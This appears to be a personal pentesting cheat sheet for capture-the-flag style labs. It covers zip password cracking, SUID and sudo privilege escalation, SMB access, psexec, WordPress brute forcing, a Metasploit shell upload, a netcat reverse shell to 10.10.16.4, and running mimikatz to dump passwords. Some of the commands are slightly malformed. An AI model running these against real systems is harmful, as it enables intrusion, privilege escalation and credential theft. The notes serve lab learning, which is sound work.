1. Crack the Passwd of Zip Package
zip2john backup.zip > passwd.txt
john passwd.txt
2. Find
- Find file with suid
find / -perm -u=s 2>/dev/null
If we got it ,we can go to GTFobins to check out whether it is possible for Privilege Escalation
- Find file for special group
find / -type f -group bugtracker 2>/dev/null
- Find file
# linux
find / -name "user.txt"
# powershell
Get-ChildItem -Recurse –Filter user.txt
3. smb
If the target machine with port 445 opened, we can check out the file under directory if no auth:
smbclient -N -L ////ip
and then dump file from directory:
smbclient \\\\10.10.10.27\\backup/
get filename
When we got the username and password, to get a shell
python3 psexec.py adminstrator@10.10.10.27
4. Upgrade Shell to tty
SHELL=/bin/bash script -q /dev/null
# or
python3 -c "import pty;pty.spawn('/bin/bash')"
5. Sudo
view the special permissions of current role:
sudo -l
When a command can be executed with sudo , we can use this command to open a new bash shell to get root privilege .
For example, ! /bin/bash
in Vim.
6. Website
Search for subdirectory
gobuster dir -u http://10.10.10.29 -w /usr/share/wordlists/dirb/big.txt
Analyze
nikto -host http://10.10.10.28 -o _28.html
WordPress
Enumerate accounts and Brute Force the password
wpscan --url http://10.10.10.29/wordpress --enumerate
wpscan --url http://10.10.10.29/wordpress -U users.txt -P backupPasswords
use metasploit
use exploit/unix/webapp/wp_admin_shell_upload
NetCat
Reverse:
nc.exe -a "-e cmd.exe 10.10.16.4 7777"
Listen:
nc -lvpn 4444
Dump Cached password
./mimikatz.exe
Comments